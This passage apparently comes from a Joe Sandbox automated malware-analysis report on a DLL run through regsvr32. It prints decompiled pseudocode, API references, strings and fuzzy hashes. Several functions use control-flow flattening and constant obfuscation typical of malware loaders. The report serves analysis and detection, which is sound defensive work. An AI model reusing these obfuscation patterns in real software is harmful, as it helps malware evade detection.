				if(_t16 == 0) {
					L4:
					return 0;
				}
				_t18 = GetProcAddress(_t16, "HtmlHelpA");
				 *(_t21 + 8) = _t18;
				if(_t18 != 0) {
					goto L5;
				}
				FreeLibrary( *(_t21 + 4));
				 *(_t21 + 4) =  *(_t21 + 4) & 0x00000000;
				goto L4;
			}

0x10021593
0x10021598
0x100215a7
0x100215ad
0x100215e5
0x100215e7
0x00000000
0x100215fc
0x100215b4
0x100215bc
0x100215bf
0x100215e1
0x00000000
0x100215e1
0x100215c7
0x100215cf
0x100215d2
0x00000000
0x00000000
0x100215d7
0x100215dd
0x00000000

APIs

Part of subcall function 100286A3: EnterCriticalSection.KERNEL32(10039ED4,?,00000000,?,?,10028366,00000010,00000000,?,?,?,?,1002776C,1002771F,100272A4,10027772), ref: 100286D1
Part of subcall function 100286A3: InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,10028366,00000010,00000000,?,?,?,?,1002776C,1002771F,100272A4,10027772), ref: 100286E3
Part of subcall function 100286A3: LeaveCriticalSection.KERNEL32(10039ED4,?,00000000,?,?,10028366,00000010,00000000,?,?,?,?,1002776C,1002771F,100272A4,10027772), ref: 100286EC
Part of subcall function 100286A3: EnterCriticalSection.KERNEL32(00000000,00000000,?,?,10028366,00000010,00000000,?,?,?,?,1002776C,1002771F,100272A4,10027772,1001E169), ref: 100286FE

Part of subcall function 10028345: __EH_prolog.LIBCMT ref: 1002834A

LoadLibraryA.KERNEL32(hhctrl.ocx,10027DD4,0000000C), ref: 100215B4
GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 100215C7
FreeLibrary.KERNEL32(?), ref: 100215D7

Strings

HtmlHelpA, xrefs: 100215C1
hhctrl.ocx, xrefs: 100215AF

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$EnterLibrary$AddressFreeH_prologInitializeLeaveLoadProc
String ID: HtmlHelpA$hhctrl.ocx
API String ID: 813623328-63838506
Opcode ID: 1f57122c41e22f1512c22e29d2660511fa21ff2bc27e04bc50b0fdc27a2b92ac
Instruction ID: 4312be458f97f88f2422cb1c6e4f687e9245a7cfbc3bf02053808be942678b0a
Opcode Fuzzy Hash: 1f57122c41e22f1512c22e29d2660511fa21ff2bc27e04bc50b0fdc27a2b92ac
Instruction Fuzzy Hash: FDF0C239405B12DFD721DF60ED49F4A7BE0EF44741F404858F147A5460DB30E9049B21

Uniqueness

Uniqueness Score: -1.00%

Function 04F73711 Relevance: 7.7, Strings: 6, Instructions: 215
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E04F73711(void* __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t203;
				intOrPtr _t204;
				intOrPtr _t209;
				void* _t224;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t235;
				signed int _t236;
				signed int _t238;
				void* _t259;
				void* _t262;
				signed int* _t268;

				_t268 =  &_v40;
				_v8 = _v8 & 0x00000000;
				_v4 = _v4 & 0x00000000;
				_v16 = 0xd592d;
				_t259 = __edx;
				_t224 = __ecx;
				_v12 = 0x99f92;
				_t262 = 0x9d7e6;
				while(1) {
					L1:
					do {
						L2:
						while(_t262 != 0x54b22) {
							if(_t262 == 0x87c72) {
								_v36 = 0xe6815b;
								_v36 = _v36 << 0xf;
								_v36 = _v36 << 0xf;
								_v36 = _v36 + 0xffff7a0c;
								_v36 = _v36 ^ 0xbfff4fb5;
								_v40 = 0xd96cd1;
								_t229 = 0x7a;
								_v40 = _v40 / _t229;
								_v40 = _v40 | 0xb75f060e;
								_v40 = _v40 << 0xe;
								_v40 = _v40 ^ 0xf38ac222;
								_v24 = 0xe8f3c2;
								_t230 = 0x34;
								_v24 = _v24 / _t230;
								_v24 = _v24 ^ 0x00036fb0;
								_v20 = 0x8bd7a8;
								_v20 = _v20 >> 8;
								_v20 = _v20 ^ 0x000b8908;
								_t228 =  *((intOrPtr*)(_t259 + 0x18));
								_t209 = E04F6568D( *((intOrPtr*)(_t259 + 0x18)), _v36, _v40, _v24, _v20);
								_t268 =  &(_t268[3]);
								 *((intOrPtr*)(_t259 + 0x34)) = _t209;
								__eflags = _t209;
								_t204 = 0x9c713;
								_t262 =  !=  ? 0x9c713 : 0xd264f;
								continue;
							} else {
								if(_t262 == _t204) {
									_v32 = 0x74e052;
									_v32 = _v32 ^ 0x44554225;
									_v32 = _v32 << 0xb;
									_v32 = _v32 ^ 0x0d1d5479;
									_v36 = 0xc0ccb7;
									_v36 = _v36 << 0xa;
									_v36 = _v36 + 0xe924;
									_v36 = _v36 ^ 0x033757ee;
									_v20 = 0x738107;
									_v20 = _v20 ^ 0xc8c5f24b;
									_v20 = _v20 ^ 0xc8b3661b;
									_v40 = 0x132547;
									_v40 = _v40 << 0xe;
									_v40 = _v40 ^ 0xf7d3ca79;
									_v40 = _v40 | 0xc579e142;
									_v40 = _v40 ^ 0xfff95755;
									_v24 = 0x9ac095;
									_v24 = _v24 + 0x2a2b;
									_v24 = _v24 ^ 0x0099f0e2;
									_v28 = 0xcc786d;
									_v28 = _v28 + 0xbf88;
									_v28 = _v28 ^ 0x00c11e6f;
									_t204 = E04F7C75F(_t228, _v32, _v36, _v20, _v40, _t228, E04F6FBDD, _t228, _v24, _t228, _v28, _t259);
									_t268 =  &(_t268[0xa]);
									 *((intOrPtr*)(_t259 + 0x28)) = _t204;
									__eflags = _t204;
									if(__eflags == 0) {
										_t262 = 0xd264f;
										while(1) {
											L1:
											goto L2;
										}
									}
								} else {
									if(_t262 == 0x9d7e6) {
										_t262 = 0x54b22;
										continue;
									} else {
										if(_t262 != 0xd264f) {
											goto L16;
										} else {
											_v24 = 0x153f76;
											_v24 = _v24 + 0xffffd6c8;
											_v24 = _v24 ^ 0x001feb73;
											_v20 = 0x74c168;
											_t231 = 0x7d;
											_v20 = _v20 / _t231;
											_v20 = _v20 ^ 0x0004c500;
											_v32 = 0x49cd45;
											_v32 = _v32 * 0x5a;
											_v32 = _v32 | 0x2745d1fe;
											_v32 = _v32 ^ 0x3ffc874c;
											_t204 = E04F6CD57( *((intOrPtr*)(_t259 + 0x18)), _v24, _v20, _v32);
										}
									}
								}
							}
							L8:
							return _t204;
						}
						_v24 = 0x6a420c;
						_v24 = _v24 + 0xff73;
						_v24 = _v24 ^ 0x00690f55;
						_v20 = 0x773a3b;
						_v20 = _v20 >> 3;
						_v20 = _v20 ^ 0x000418aa;
						_t203 = E04F6F88D(_t224, __eflags, _v24, _v20);
						 *((intOrPtr*)(_t259 + 0x18)) = _t203;
						_pop(_t228);
						__eflags = _t203;
						if(_t203 == 0) {
							_t262 = 0x806c5;
							_t204 = 0x9c713;
							goto L16;
						} else {
							_v32 = 0xbe2c9a;
							_t235 = 0x3b;
							_v32 = _v32 / _t235;
							_v32 = _v32 << 1;
							_v32 = _v32 ^ 0x000ae68b;
							_v24 = 0x4a9b82;
							_v24 = _v24 ^ 0xa1d657c4;
							_v24 = _v24 ^ 0xa19f65bc;
							_v20 = 0x2074aa;
							_v20 = _v20 | 0x9231ff7e;
							_v20 = _v20 ^ 0x923a89a1;
							_v36 = 0x8f0e00;
							_t236 = 0x33;
							_v36 = _v36 * 0xf;
							_v36 = _v36 / _t236;
							_v36 = _v36 + 0xffff6adf;
							_v36 = _v36 ^ 0x0027ca7c;
							E04F76EB4(_v32, _v24,  *((intOrPtr*)(_t259 + 0x18)),  *((intOrPtr*)(_t259 + 0x18)), _v20, _v36);
							_v28 = 0xf54b77;
							_v28 = _v28 | 0xbbc39224;
							_v28 = _v28 ^ 0xbbf40ae4;
							_v24 = 0xe05cab;
							_t238 = 0x43;
							_v24 = _v24 / _t238;
							_v24 = _v24 ^ 0x000b4d1a;
							_v32 = 0x445581;
							_v32 = _v32 + 0xffff2f24;
							_v32 = _v32 >> 0xa;
							_v32 = _v32 ^ 0x0009a417;
							_v20 = 0x78f408;
							_v20 = _v20 << 5;
							_v20 = _v20 ^ 0x0f1f0307;
							_t228 = _v28;
							E04F7F05E(_v28, _v24,  *((intOrPtr*)(_t259 + 0x18)), _v32, _v20);
							_t268 =  &(_t268[7]);
							_t262 = 0x87c72;
							goto L1;
						}
						goto L8;
						L16:
						__eflags = _t262 - 0x806c5;
					} while (__eflags != 0);
					goto L8;
				}
			}

0x04f73711
0x04f73714
0x04f73719
0x04f73722
0x04f7372a
0x04f7372c
0x04f7372e
0x04f73736
0x04f73740
0x04f73740
0x04f73745
0x00000000
0x04f73745
0x04f73757
0x04f738d7
0x04f738e1
0x04f738e6
0x04f738eb
0x04f738f3
0x04f738fb
0x04f73909
0x04f7390e
0x04f73914
0x04f7391c
0x04f73921
0x04f73929
0x04f73935
0x04f73938
0x04f7393c
0x04f73944
0x04f7394c
0x04f73951
0x04f73969
0x04f7396c
0x04f73971
0x04f73974
0x04f73977
0x04f7397b
0x04f73980
0x00000000
0x04f7375d
0x04f7375f
0x04f737f5
0x04f737fd
0x04f73805
0x04f7380a
0x04f73812
0x04f7381a
0x04f7381f
0x04f73827
0x04f7382f
0x04f73837
0x04f7383f
0x04f73847
0x04f7384f
0x04f73854
0x04f7385c
0x04f73864
0x04f7386c
0x04f73874
0x04f7387c
0x04f73884
0x04f7388c
0x04f73894
0x04f738bd
0x04f738c2
0x04f738c5
0x04f738c8
0x04f738ca
0x04f738d0
0x04f73740
0x04f73740
0x00000000
0x04f73740
0x04f73740
0x04f73765
0x04f7376b
0x04f737eb
0x00000000
0x04f7376d
0x04f7376f
0x00000000
0x04f73775
0x04f73775
0x04f7377f
0x04f73787
0x04f7378f
0x04f7379d
0x04f737a0
0x04f737a4
0x04f737ac
0x04f737b9
0x04f737bd
0x04f737c5
0x04f737dc
0x04f737e2
0x04f7376f
0x04f7376b
0x04f7375f
0x04f737e3
0x04f737ea
0x04f737ea
0x04f73988
0x04f73992
0x04f7399a
0x04f739a2
0x04f739aa
0x04f739af
0x04f739bf
0x04f739c4
0x04f739c8
0x04f739c9
0x04f739cb
0x04f73afc
0x04f73b01
0x00000000
0x04f739d1
0x04f739d1
0x04f739e1
0x04f739e6
0x04f739ec
0x04f739f0
0x04f739f8
0x04f73a00
0x04f73a08
0x04f73a10
0x04f73a18
0x04f73a20
0x04f73a28
0x04f73a35
0x04f73a36
0x04f73a40
0x04f73a44
0x04f73a4c
0x04f73a69
0x04f73a6e
0x04f73a78
0x04f73a80
0x04f73a88
0x04f73a96
0x04f73a99
0x04f73a9d
0x04f73aa5
0x04f73aad
0x04f73ab5
0x04f73aba
0x04f73ac2
0x04f73aca
0x04f73acf
0x04f73ae6
0x04f73aea
0x04f73aef
0x04f73af2
0x00000000
0x04f73af2
0x00000000
0x04f73b06
0x04f73b06
0x04f73b06
0x00000000
0x04f73b12

Strings

O&, xrefs: 04F7373B
+*, xrefs: 04F73874
;:w, xrefs: 04F739A2
$, xrefs: 04F7381F
-Y, xrefs: 04F73722
%BUD, xrefs: 04F737FD

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $$%BUD$+*$-Y$;:w$O&
API String ID: 0-911005551
Opcode ID: f72161816d27da3993d6579c3b9f973034bdbaee10cace82fc075273cdfa8890
Instruction ID: 60d89dc946122bf2cec12cf14f4112f0a049904ae4ed03b7b6f3f3ce4e0a0c9e
Opcode Fuzzy Hash: f72161816d27da3993d6579c3b9f973034bdbaee10cace82fc075273cdfa8890
Instruction Fuzzy Hash: 77A123B150D3019BD748CF21D94940BBBE1BBC8758F100A2DF4D9A6220D7B8EA4ADF97

Uniqueness

Uniqueness Score: -1.00%

Function 100114D8 Relevance: 7.6, APIs: 5, Instructions: 92
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E100114D8(void* __ecx, void* __eflags) {
				void* _v8;
				long _v12;
				long _v16;
				signed char _v23;
				struct _MEMORY_BASIC_INFORMATION _v44;
				struct _SYSTEM_INFO _v80;
				void* _v92;
				void* _t29;
				int _t33;
				intOrPtr _t35;
				void* _t43;
				void* _t46;
				signed int _t49;
				void* _t54;
				void* _t55;
				void* _t62;
				void* _t63;

				_t29 = 4;
				E100116D0(_t29, __ecx);
				_t55 = _t63;
				if(VirtualQuery(_t55,  &_v44, 0x1c) == 0) {
					L9:
					_t33 = 0;
				} else {
					_t46 = _v44.AllocationBase;
					GetSystemInfo( &_v80);
					_t49 = _v80.dwPageSize;
					_t35 =  *0x1003a174; // 0x2
					_t54 = ( !(_t49 - 1) & _t55) - _t49;
					asm("sbb esi, esi");
					_t62 = (( ~(_t35 - 1) & 0xfffffff1) + 0x11) * _t49 + _t46;
					_v12 = _t49;
					if(_t54 < _t62) {
						goto L9;
					} else {
						if(_t35 == 1) {
							_v8 = _t54;
							goto L14;
						} else {
							_v8 = _t46;
							while(VirtualQuery(_v8,  &_v44, 0x1c) != 0) {
								_v8 = _v8 + _v44.RegionSize;
								if((_v44.State & 0x00001000) == 0) {
									continue;
								} else {
									_t43 = _v44.BaseAddress;
									_v8 = _t43;
									if((_v23 & 0x00000001) == 0) {
										if(_t54 >= _t43) {
											if(_t43 < _t62) {
												_v8 = _t62;
											}
											VirtualAlloc(_v8, _v12, 0x1000, 4);
											_t35 =  *0x1003a174; // 0x2
											L14:
											asm("sbb eax, eax");
											_t33 = VirtualProtect(_v8, _v12, ( ~(_t35 - 1) & 0x00000103) + 1,  &_v16);
										} else {
											goto L9;
										}
									} else {
										_t33 = 1;
									}
								}
								goto L15;
							}
							goto L9;
						}
					}
				}
				L15:
				return _t33;
			}

0x100114e3
0x100114e4
0x100114e9
0x100114fa
0x10011573
0x10011573
0x100114fc
0x100114fc
0x10011503
0x10011509
0x1001150c
0x10011518
0x1001151f
0x1001152a
0x1001152e
0x10011531
0x00000000
0x10011533
0x10011536
0x10011594
0x00000000
0x10011538
0x10011538
0x10011540
0x10011556
0x1001155c
0x00000000
0x1001155e
0x10011562
0x10011565
0x10011568
0x10011571
0x10011579
0x1001157b
0x1001157b
0x10011587
0x1001158d
0x10011597
0x1001159a
0x100115ad
0x00000000
0x00000000
0x00000000
0x1001156a
0x1001156c
0x1001156c
0x10011568
0x00000000
0x1001155c
0x00000000
0x10011540
0x10011536
0x10011531
0x100115b3
0x100115ba

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 100114F2
GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 10011503
VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 10011549
VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 10011587
VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 100115AD

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Virtual$Query$AllocInfoProtectSystem
String ID:
API String ID: 4136887677-0
Opcode ID: 97a50c7f13db13dee5731814e999132948e6409a17082cbcdfe079a2ef9554a8
Instruction ID: 2a7587c6a6ccc183a4930b34cb1094d21f40c1ebdf9b0ce79955c776c87e8298
Opcode Fuzzy Hash: 97a50c7f13db13dee5731814e999132948e6409a17082cbcdfe079a2ef9554a8
Instruction Fuzzy Hash: 4831D532E0061DEBDF15CBA4CD85AEE7BB9EB44364F110166E902EB190D731DE81DB90

Uniqueness

Uniqueness Score: -1.00%

Function 1001712C Relevance: 7.5, APIs: 5, Instructions: 32
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001712C() {
				struct _FILETIME _v12;
				signed int _v16;
				union _LARGE_INTEGER _v20;
				signed int _t7;
				signed int _t9;
				signed int _t10;
				signed int _t11;
				signed int _t15;
				signed int _t22;

				_t7 =  *0x100371f4; // 0x39cf7dc9
				if(_t7 == 0 || _t7 == 0xbb40e64e) {
					GetSystemTimeAsFileTime( &_v12);
					_t9 = GetCurrentProcessId();
					_t10 = GetCurrentThreadId();
					_t11 = GetTickCount();
					QueryPerformanceCounter( &_v20);
					_t15 = _v16 ^ _v20.LowPart;
					_t22 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t9 ^ _t10 ^ _t11 ^ _t15;
					 *0x100371f4 = _t22;
					if(_t22 == 0) {
						 *0x100371f4 = 0xbb40e64e;
					}
					return _t15;
				}
				return _t7;
			}

0x10017132
0x10017139
0x10017147
0x10017153
0x1001715b
0x10017163
0x1001716f
0x10017178
0x1001717b
0x1001717d
0x10017183
0x10017185
0x10017185
0x00000000
0x1001718f
0x10017191

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 10017147
GetCurrentProcessId.KERNEL32 ref: 10017153
GetCurrentThreadId.KERNEL32 ref: 1001715B
GetTickCount.KERNEL32 ref: 10017163
QueryPerformanceCounter.KERNEL32(?), ref: 1001716F

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 50d67e1d383f69dbcdee96c8bd050fcd69c67ab022712e76dea518af0d4ef41f
Instruction ID: 50d8a5486e903600f9401ca6b37cf5d4b62784a0750936f3c6adc6678c320fb2
Opcode Fuzzy Hash: 50d67e1d383f69dbcdee96c8bd050fcd69c67ab022712e76dea518af0d4ef41f
Instruction Fuzzy Hash: 2BF0F972D00239ABDB20EBB8DD8859EB7F8FF08394B920550E905EB110EA30E951CA80

Uniqueness

Uniqueness Score: -1.00%

Function 100268C5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43
librarystringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E100268C5(void* __esi, intOrPtr _a4, char _a8) {
				intOrPtr _v8;
				char _v284;
				intOrPtr _t10;
				void* _t15;
				void* _t20;

				_t20 = __esi;
				_t10 =  *0x100371f4; // 0x39cf7dc9
				_v8 = _t10;
				if(_a8 != 0x800) {
					if(GetLocaleInfoA(_a8, 3,  &_a8, 4) != 0) {
						goto L2;
					} else {
					}
				} else {
					lstrcpyA( &_a8, "LOC");
					L2:
					_push(_t20);
					_t15 = E100119C1( &_v284, 0x112, _a4,  &_a8);
					if(_t15 == 0xffffffff || _t15 >= 0x112) {
						_t12 = 0;
					} else {
						_t12 = LoadLibraryA( &_v284);
					}
				}
				return E10011A49(_t12, _v8);
			}

0x100268c5
0x100268d5
0x100268da
0x100268e0
0x10026933
0x00000000
0x00000000
0x10026935
0x100268e2
0x100268e8
0x100268ee
0x100268ee
0x10026903
0x1002690e
0x10026937
0x10026914
0x1002691b
0x1002691b
0x10026939
0x10026943

APIs

lstrcpyA.KERNEL32(00000800,LOC), ref: 100268E8
LoadLibraryA.KERNEL32(?), ref: 1002691B
GetLocaleInfoA.KERNEL32(00000800,00000003,00000800,00000004), ref: 1002692B

Strings

LOC, xrefs: 100268E2

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: InfoLibraryLoadLocalelstrcpy
String ID: LOC
API String ID: 864663389-519433814
Opcode ID: 13666489dbc6076c2ecfb5badc28e9646f7442118de2c7f77aed264709aefa04
Instruction ID: dd3d41542b16ba1cdf5d3771843f0e70b9dc9993811390860c1d518de318e0b2
Opcode Fuzzy Hash: 13666489dbc6076c2ecfb5badc28e9646f7442118de2c7f77aed264709aefa04
Instruction Fuzzy Hash: 3A018671900218FBDF25DF60DC49ADE37ACEB08324F908561FD15D6190EB70DB999B90

Uniqueness

Uniqueness Score: -1.00%

Function 04F642B2 Relevance: 6.6, Strings: 5, Instructions: 389
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E04F642B2() {
				char _v520;
				short _v524;
				short _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				void* _t382;
				intOrPtr _t393;
				signed int _t421;
				void* _t427;
				void* _t433;
				signed int _t436;
				signed int _t438;
				signed int _t439;
				signed int _t441;
				signed int _t442;
				signed int _t447;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t459;
				signed int _t460;
				intOrPtr _t462;
				signed int _t464;
				signed int _t499;
				void* _t500;
				signed int _t501;
				signed int* _t503;

				_t503 =  &_v592;
				_t502 = _v548;
				_t436 = 0;
				_t499 = _v548;
				_t382 = 0x1e985;
				_v536 = 0xf5428;
				_t500 = 0xbfaa1;
				_v532 = 0x105fd;
				_v528 = 0;
				_v524 = 0;
				while(_t382 != 0xdaaa) {
					if(_t382 == 0x1e985) {
						_t382 = 0xdaaa;
						continue;
					}
					if(_t382 == 0x5af78) {
						_v584 = 0x665de9;
						_v584 = _v584 | 0x6cd06a84;
						_v584 = _v584 >> 4;
						_v584 = _v584 ^ 0x06cf77fe;
						_t447 = _v584;
						_v592 = 0x40cd26;
						_push(_t447);
						_v548 = _t447;
						_v592 = _v592 * 3;
						_v592 = _v592 + 0xffffe188;
						_v592 = _v592 + 0x6404;
						_v592 = _v592 ^ 0x00cbbacc;
						_v584 = 0x5c13bd;
						_v584 = _v584 * 0x68;
						_v584 = _v584 << 0xb;
						_v584 = _v584 ^ 0x402130f5;
						_t499 = E04F73EE6(_t447, _t447, __eflags);
						__eflags = _t499;
						_t382 =  !=  ? _t500 : 0xa0884;
						continue;
					}
					if(_t382 == 0x64a83) {
						_v588 = 0x18b508;
						_v588 = _v588 * 0x3d;
						_v588 = _v588 + 0xffff1d66;
						_v588 = _v588 << 8;
						_v588 = _v588 ^ 0xe24b78df;
						_v592 = 0xc0cdbf;
						_v592 = _v592 * 0x51;
						_v592 = _v592 >> 0xd;
						_v592 = _v592 ^ 0xee457e24;
						_v592 = _v592 ^ 0xee459edd;
						_v576 = 0x478aeb;
						_v576 = _v576 + 0xfffff271;
						_v576 = _v576 ^ 0x004c25c0;
						E04F7E4B2(_v588, _v592, __eflags, _v576, _t499);
						_t382 = 0xa0884;
						continue;
					}
					if(_t382 == 0xa0884) {
						_v588 = 0xa33f56;
						_v588 = _v588 >> 0xd;
						_v588 = _v588 * 0xb;
						_v588 = _v588 + 0xffff227a;
						_v588 = _v588 ^ 0xfff61799;
						_v592 = 0x68ae8a;
						_v592 = _v592 << 5;
						_v592 = _v592 | 0x0c2bae50;
						_v592 = _v592 * 9;
						_v592 = _v592 ^ 0x773698a5;
						_v584 = 0x660b07;
						_v584 = _v584 * 0x74;
						_v584 = _v584 >> 0xa;
						_t377 =  &_v584;
						 *_t377 = _v584 ^ 0x000305c6;
						__eflags =  *_t377;
						E04F68B6C(_v588, _t502, _v592, _v584);
						L28:
						__eflags = 0;
						return 0;
					}
					if(_t382 == 0xac157) {
						_v576 = 0xd21c76;
						_v576 = _v576 >> 7;
						_v576 = _v576 ^ 0x0201a438;
						_v588 = 0x39a5d4;
						_t455 = 0x6c;
						_v588 = _v588 / _t455;
						_t456 = 0x71;
						_v588 = _v588 * 0x6c;
						_v588 = _v588 >> 1;
						_v588 = _v588 ^ 0x001cd2cf;
						_v584 = 0x4cae4f;
						_v584 = _v584 >> 8;
						_v584 = _v584 | 0xa54e9c63;
						_v584 = _v584 ^ 0xa54edceb;
						_v552 = 0xab7c03;
						_v552 = _v552 | 0xbdab4999;
						_v552 = _v552 ^ 0xbdab7d9a;
						_v580 = 0xd06866;
						_v580 = _v580 | 0x01af5c59;
						_v580 = _v580 * 0x31;
						_v580 = _v580 ^ 0xc63d220d;
						_v580 = _v580 ^ 0xa7dbf640;
						_v592 = 0xdfe25;
						_v592 = _v592 << 2;
						_t457 = 0x44;
						_v592 = _v592 / _t456;
						_v592 = _v592 | 0x065f4b35;
						_v592 = _v592 ^ 0x065f7ffe;
						_v556 = 0x1d588a;
						_v556 = _v556 + 0x253d;
						_v556 = _v556 ^ 0x001853ad;
						_v572 = 0xf9d5d7;
						_v572 = _v572 << 1;
						_v572 = _v572 | 0x522f8a21;
						_v572 = _v572 + 0x3ea7;
						_v572 = _v572 ^ 0x53f7df56;
						_v560 = 0x1d5aca;
						_v560 = _v560 + 0xbfae;
						_v560 = _v560 ^ 0x001c2d42;
						_v564 = 0xd143df;
						_v564 = _v564 | 0x7e0affc2;
						_v564 = _v564 << 7;
						_v564 = _v564 ^ 0x6df9f50a;
						_v568 = 0xb23da8;
						_v568 = _v568 << 8;
						_push(_t457);
						_v568 = _v568 / _t457;
						_v568 = _v568 ^ 0x0298e2f5;
						_t421 = E04F7602C(_v592, _v576, _v556, _v572, _v580 | _v552 | _v584, _v560, _v588,  &_v520, _v564, _t457, _v568);
						_t502 = _t421;
						_t503 =  &(_t503[0xa]);
						__eflags = _t421 - 0xffffffff;
						if(__eflags == 0) {
							goto L28;
						}
						_t382 = 0x5af78;
						continue;
					}
					if(_t382 != _t500) {
						L25:
						__eflags = _t382 - 0x7036e;
						if(__eflags != 0) {
							continue;
						}
						goto L28;
					}
					_v592 = 0xee48c0;
					_v592 = _v592 + 0xffff8154;
					_v592 = _v592 >> 0xf;
					_v592 = _v592 ^ 0x000001da;
					_v568 = 0x64de44;
					_v568 = _v568 + 0xb70;
					_v568 = _v568 ^ 0x006ce7ef;
					_v588 = 0xed2a65;
					_v588 = _v588 >> 2;
					_v588 = _v588 >> 4;
					_t459 = 0x3c;
					_v588 = _v588 * 0x54;
					_v588 = _v588 ^ 0x013a299a;
					_v564 = 0x19bfe;
					_v564 = _v564 >> 3;
					_v564 = _v564 ^ 0x00025a34;
					_v584 = 0x345599;
					_v584 = _v584 | 0x5b1a83c0;
					_v584 = _v584 ^ 0x5b3d560c;
					_v580 = 0x24b12;
					_v580 = _v580 + 0xffff8e02;
					_v580 = _v580 >> 0x10;
					_v580 = _v580 + 0xfffffa0b;
					_v580 = _v580 ^ 0xfff9a760;
					_v572 = 0x7f1eae;
					_t460 = 0x17;
					_v572 = _v572 / _t459;
					_v572 = _v572 / _t460;
					_v572 = _v572 ^ 0x4f933f06;
					_v572 = _v572 ^ 0x4f92b1e6;
					_t427 = E04F6CA7B( &_v540, _v568, _v592, _t502, _t460, _t499, _v548, _v588, _t460, _v564, _t460, _v584, _v580, _v572);
					_t503 =  &(_t503[0xc]);
					if(_t427 == 0) {
						L16:
						__eflags = _t436;
						if(__eflags == 0) {
							_t382 = _t500;
						} else {
							_v580 = 0x4dd4b4;
							_v580 = _v580 ^ 0x8f5c702a;
							_v580 = _v580 + 0x238e;
							_v580 = _v580 | 0xc384f0c6;
							_v580 = _v580 ^ 0xcf9db428;
							_v588 = 0x2737c2;
							_v588 = _v588 ^ 0x0f377b04;
							_v588 = _v588 + 0xffff73b0;
							_v588 = _v588 ^ 0x4530888f;
							_v588 = _v588 ^ 0x4a3dcfab;
							_v584 = 0x7920c0;
							_v584 = _v584 * 0x2d;
							_v584 = _v584 ^ 0x15425eeb;
							_v592 = 0x4655a7;
							_v592 = _v592 << 4;
							_v592 = _v592 ^ 0x88e376f1;
							_v592 = _v592 ^ 0x8c86d58d;
							_t462 =  *0x4f82b10; // 0x0
